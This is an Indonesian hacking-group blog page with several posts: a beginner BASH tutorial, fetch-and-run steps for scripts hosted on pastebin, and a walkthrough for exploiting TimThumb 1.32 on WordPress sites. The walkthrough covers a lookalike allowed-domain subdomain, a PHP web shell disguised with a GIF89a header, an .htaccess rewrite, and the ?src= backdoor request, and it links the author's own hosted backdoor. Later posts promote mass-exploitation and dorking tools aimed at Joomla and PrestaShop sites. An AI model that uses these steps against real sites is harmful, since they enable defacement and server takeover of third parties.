Selasa, 31 Juli 2018

Belajar BASH Script #1: Untuk Pemula

Belajar BASH Script #1:
1. Perkenalan
2. Basic: Print "Stdout"
3. Basic: Variable

1. Perkenalan

Saat pertama kali saya ingin mengenal BASH Script, yang saya pikirkan hanya satu yaitu "Susah", Tapi nyatanya? Sekarang BASH adalah andalan saya untuk membuat program yang bilamana saya membutuhkan interaksi antar jaringan maupun Aplikasi. Kemudian yang paling parahnya setelah jatuh cinta sama BASH Script, saya melupakan bahasa pemrograman yang saya cintai sebelumnya yaitu PHP. Karena menurut saya BASH itu sangat powerful dan sangat mudah untuk dipelajari apalagi kalau kalian Linux User? kalian rugi 100% kalau tidak belajar BASH. Ok kalau begitu saya sudahi dulu cerita ini, kita mulai dengan pembahasan BASH Script.

Apa itu BASH Script?
BASH Script adalah sebuah skrip yang mengkompilasi command-command di dalam shell dan biasa digunakan di dalam Linux Shell. BASH sendiri adalah singkatan dari "Bourne Again Shell" yaitu perkembangan dari "Bourne Shell (.sh)".

2. Print "Stdout"

#!/bin/bash
echo "Hello Dweeb!";

Pada Script di atas, bila dijalankan kita akan melakukan print sebuah kata Hello Dweeb!.



Apa itu "#!/bin/bash" ?
Adalah sebuah header yang mengarahkan kedalam Binary BASH yang terdapat pada direktori /bin/. Saat kita menjalankan sebuah BASH Script menggunakan Dot Slash "./" Sistem Operasi tentunya tidak akan tahu dimana letak Binary BASH tersebut bilamana kita tidak menggunakan header. Akan terdapat kasus Error kalau Script yang kalian buat itu sangat kompleks, tanpa menggunakan header #!/bin/bash, dan dijalankan menggunakan Dot Slash.

2.1. Echo
#!/bin/bash
echo "Hello Dweeb!";

2.2. Printf
#!/bin/bash
printf "Hello Dweeb! \n";
Pada saat saya membuat sebuah script, biasanya saya lebih sering menggunakan echo daripada printf, dikarenakan echo sendiri sudah include newline (\n atau Carriage Return) untuk pengakhiran suatu baris.

3. Variable

Dalam bahasa pemrograman variable digunakan untuk menyimpan suatu object yang dapat dipanggil untuk mewakili suatu nilai tertentu dan isi dalam variable itu sendiri dapat berubah-ubah.
#!/bin/bash
NAMA="Erwin"
echo "Hello Dweeb!";
echo "Nama saya adalah $NAMA";
echo "Dan $NAMA adalah nama saya.";
Script di atas adalah contoh penggunaan variable NAMA yang berisi sebuah string yaitu Erwin. Mari kita coba jalankan script di atas dan bilamana sudah dijalankan maka output tersebut akan terlihat seperti di bawah ini.

Supaya lebih menarik lagi, berikut ini ada beberapa cara untuk menyimpan sebuah object kedalam variable.

3.1. Memasukan Command kedalam Variable BASH Script

Untuk memasukan command (shell) kedalam sebuah variable terdapat 2 cara yaitu:

A. Menggunakan Backticks
`command`
B. Menggunakan Bracket Variable
$(command)
Contoh script yang menggunakan command di dalam sebuah variable
#!/bin/bash
NAMA="Erwin"
TANGGAL=$(date)
UP=`uptime`
echo "Hello Dweeb!";
echo "Nama saya adalah $NAMA";
echo "Dan $NAMA adalah nama saya.";
echo "Sekarang tanggal $TANGGAL";
echo "Komputer saya sudah hidup sejak $UP";
Dalam script tersebut, dimana variable TANGGAL mengambil object dari sebuah command "date" dan variable UP mengambil object dari sebuah command "uptime". Bila script di atas dijalankan akan keluar output seperti di bawah ini.

Sekian terlebih dahulu.
Note: Jika memungkinkan artikel ini akan terus di-update, terima kasih.
Share:
Read More

Kamis, 22 Februari 2018

[Tools] IP-Tracker

Ip Tracker BASH

Hallo semua, apakabar kalian semua? Pastinya sehat selalu dong.. Awalnya bingung mau posting apa di blog ini tapi baru engeh kalau kami punya tools IP-Tracker, dan akhirnya kami share tools ini. Iya mungkin kalian butuh untuk melacak ip seseorang atau apalah. Tools IP-Tracker menggunakan api yang sudah di sediakan oleh https://tools.keycdn.com/
Apa saja yang terdapat dalam tools ini?

  • ISP (Internet Service Provider)
  • IP Address (Alamat Address)
  • Country (Negara)
  • City (Kota)
  • Latitude
  • Longitude
  • Google Maps

Untuk download source :
https://pastebin.com/raw/3fNbXeeQ

$ wget https://pastebin.com/raw/3fNbXeeQ -O IPT_zerobyte.sh
$ chmod +x IPT_zerobyte.sh
$ ./seo_zerobyte.sh
Jika ada yang mau ditanyakan, silahkan di group aja ya:
https://www.facebook.com/groups/1705027012853306/
Telegram Group : @Zerobyte_id

Share:
Read More

Kamis, 01 Februari 2018

[Tools] SEO Mass Checker

SEO Mass Checker

Hello semuanya, lama sebulan lebih tidak posting dikarnakan sibuk dengan hal lain sampai tidak sempat untuk memposting, dan sekarang akhirnya sempet untuk posting. Disini kami akan membagikan tools yaitu SEO Mass Chekcer, tools ini terdiri dari beberapa checker yaitu :
  • Rank Alexa, 
  • Domain Authority(DA), 
  • Page Authority(PA),
  • Daily Pageviews (DP) .

Untuk download source :
Pastebin : https://pastebin.com/raw/FmVGGiyc

$ wget https://pastebin.com/raw/FmVGGiyc -O seo_zerobyte.sh
$ chmod +x seo_zerobyte.sh
$ ./seo_zerobyte.sh
Jika ada yang mau ditanyakan, silahkan di group aja ya:
https://www.facebook.com/groups/1705027012853306/
Telegram Group : @Zerobyte_id

Terima kasih ...
Share:
Read More

Jumat, 12 Januari 2018

[Tools] Grab & Download Photo's Instagram

Grab & Download Photo's Instagram
Hello,
Kali ini saya akan membagikan Tools Grab & Download Photo's Instagram.
Tools ini hanya mendownload 12 photo, dan mendownload nya juga mulai dari postingan terbaru.

Untuk download source :
GitHub Instagram

./instagram.sh

Jika ada yang mau ditanyakan, silahkan di group aja ya:
https://www.facebook.com/groups/1705027012853306/
Share:
Read More

Sabtu, 30 Desember 2017

Exploit Timthumb 1.32 dan Membuat Payload Backdoor Untuk Timthumb


Hallo all, kali ini saya akan membahas tentang exploit yang sudah terbilang lama, tetapi masih sering dipakai oleh defacer-defacer sekarang ini. Exploit yang akan kita bahas yaitu tentang Exploit Timthumb.

Banyak yang bilang exploit Timthumb ini menggunkan teknik Remote Code Execution, tapi menurut yang saya setelah membaca dari beberapa sumber terpercaya, Teknik exploit Timthumb ini lebih mirip disebut Remote File Inclusion karena kita menggunakan Payload Backdoor dari Instance lain.

Sebelum kita melakukan Exploit, lebih baik kita bahas dulu cara membuat Payload Backdoor Timthumb tersebut untuk melakukan Exploitasi.


  • Cara Membuat Payload Backdoor Untuk Timthumb

1. Create Subdomain dan Hosting yang termasuk Allowed

$allowedSites = array (
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
);
Diatas adalah potongan source code yang saya ambil dari timthumb.php versi 1.32.
if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower ($src), 'https://') !== false)
if (strpos (strtolower ($url_info['host']), $site) !== false) 
Dari sini kita simpulkan bahwa timthumb bisa kita eksploitasi dengan menggunakan list array pada $allowedSites di atas.
Contoh:
  • flickr.com.cpanelmu.com
  • picasa.com.webkamu.com
  • Dan lain-lain yang terdapat pada $allowedSites
Intinya kamu bisa buat subdomain seperti di atas.

2. Membuat shell ekstensi .txt dan tambahkan header "gif".

GIF89a;
Header gif ini berfungsi supaya executor dalam timthumb tersebut membaca bahwa Payload Backdoor yang kamu buat adalah sebuah gambar gif.

Langsung ke intinya saja ya, kalian buat file backdoor tapi ekstensi .txt kemudian pada line paling atas tambahkan header gif tersebut.
Filename: shell.txt
GIF89a;
<?php
    # shellnya
?>

3. Buat .htaccess Rewrite

Buat file .htaccess
RewriteEngine on
RewriteRule ^shell\.php$ /shell.txt [L]
Fungsinya adalah memanggil configurasi webserver supaya dapat me Rewrite/Rename file .txt tersebut menjadi format .php.

Sekiranya dalam Root Directory Web untuk Payload Backdoor kalian:

Jika sudah berhasil kalian dapat membukanya
Contoh: http://flickr.com.webkalian.com/shell.php
Output hanya source code mentah dari php.

Atau seperti gambar dibawah ini:
Jika sudah tandanya kalian berhasil membuat Payload Backdoor tersebut.

Note: Jika kalian tidak punya domain dan hosting yang dapat create subdomain, untuk sementara kalian bisa pakai saya http://flickr.com.ehpet.net/uploader.php

  • Timthumb Exploitation

OK! untuk exploit disini saya akan samarkan nama target web tersebut.
Target tersebut menggunkan CMS Wordpress dengan Themes newspro dan memiliki timthumb versi 1.25 (karena yang dapat dieksploitasi itu hanya timthumb <= 1.32/1.32 ke bawah).

Lalu saya coba eksploitasi dengan menggunakan Payload Backdoor yang saya miliki yaitu http://flickr.com.ehpet.net/uploader.php.

Kemudian cara eksploiatsi dengan cara menambahkan ?src=URL_Backdoor pada timthumb.php seperti di bawah ini:

Tara! Jika output mengeluarkan file (yang saya drag warna hijau) seperti di atas, artinya target tersebut berhasil dieksploitasi!


Sekian dari saya,
Jika ada sesuatu hal yang kurang jelas, bisa kita diskusikan dalam group:
Telegram: https://t.me/joinchat/HUH7cBCF93c9eyVCIDP4VQ
Facebook: https://www.facebook.com/groups/1705027012853306/
Terima kasih.
Share:
Read More

Minggu, 24 Desember 2017

[Tools] Auto Exploit Werehouse All Modules

Auto Exploit Werehouse All Modules Prestashop

Hello,
Kali ini saya akan membagikan tools Auto Exploit Werehouse All Modules [BASH].
Beberapa hari yang lalu sudah ada yang menunggu tools ini disebarkan dan sekarang saya akan sebarkan.

Untuk download source :
GitHub WereHouse


Usage :
./Werehouse_All_Modules.sh
Bing dorking => Bing Grab [BASH]
Auto exploit com_fabrik => Auto Exploit Com_Fabrik [BASH]
Mass exploiter CMS Joomla! => Joomla Mass Exploiter Tools V.1Joomla Mass Exploiter Tools V.1

Jika ada yang mau ditanyakan, silahkan di group aja ya:
https://www.facebook.com/groups/1705027012853306/


Share:
Read More

[Tools] Bing Grab Domains v1

Bing Dorking


Hallo,
Sesuai permintaan yang ada di group, sudah selesai tools [Tools] Bing Grab Domains, Bing grab ini masih belum sempurna, namun sudah dapat digunakan.

Untuk download source :
GitHub Bing Grab

Usage :
./Bing_Grab.sh

Auto exploit com_fabrik => Auto Exploit Com_Fabrik [BASH] 
Mass exploiter CMS Joomla! => Joomla Mass Exploiter Tools V.1Joomla Mass Exploiter Tools V.1

Jika ada yang mau ditanyakan, silahkan di group aja ya:
https://www.facebook.com/groups/1705027012853306/

Share:
Read More